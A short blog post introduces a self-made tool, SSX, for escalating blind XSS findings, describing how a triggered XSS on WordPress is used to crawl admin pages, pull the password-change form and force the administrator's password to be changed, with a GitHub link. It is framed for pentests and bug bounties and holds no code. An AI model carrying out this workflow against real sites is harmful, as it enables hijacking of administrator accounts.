.png)
3 years ago
156 BOOK THIS SPACE FOR AD
ARTICLE AD
Assalamualaikum Warohmatullahi Wabarokatuh :)
Hello, it’s been a long time since I shared this story.
This time I want to share the tools that I make myself, usually for the purposes of the pentest project, but it can also be used for bug bounty programs so that the level of risk of finding can be higher.
You may have heard or used xsshunter, ezxss, and similar frameworks to exploit XSS / Blind XSS, this SSX tool is the next step of these frameworks.
Some of us, including myself, often stop when we get Blind XSS findings, because we don’t know what else to do, even though it would be even better if we first exploited it more deeply.
We can use the SSX tool that I usually use, but don’t install it on a production server because I haven’t implemented the security for this tool, plus I’m also not good at coding,
This is an example of the XSS exploit on the Wordpress CMS framework using SXX, but it can usually run on other CMS as well.
SSX will send all the links on the page where XSS is triggered, so you must get some valid XSS first.
2. From this link, we can crawl the link again by clicking [crawl] on the target page, in this example I click the [crawl] button on the page /wp-admin/post.php?post=3&action=edit from here XSS will do without admin interaction, we will get more links on that page.
3. The next step is to get a password change form, click the [get forms] button on the /wp-admin/profile.php link, then the form on that page will appear on the SSX dashboard.
Fill in the new password then click Force Submit, then SSX will force the admin to change the password. For demo, see the video below:
Github: https://github.com/dimazarno/SSX
Happy hunting!
Bengali (Bangladesh) · 
English (United States) ·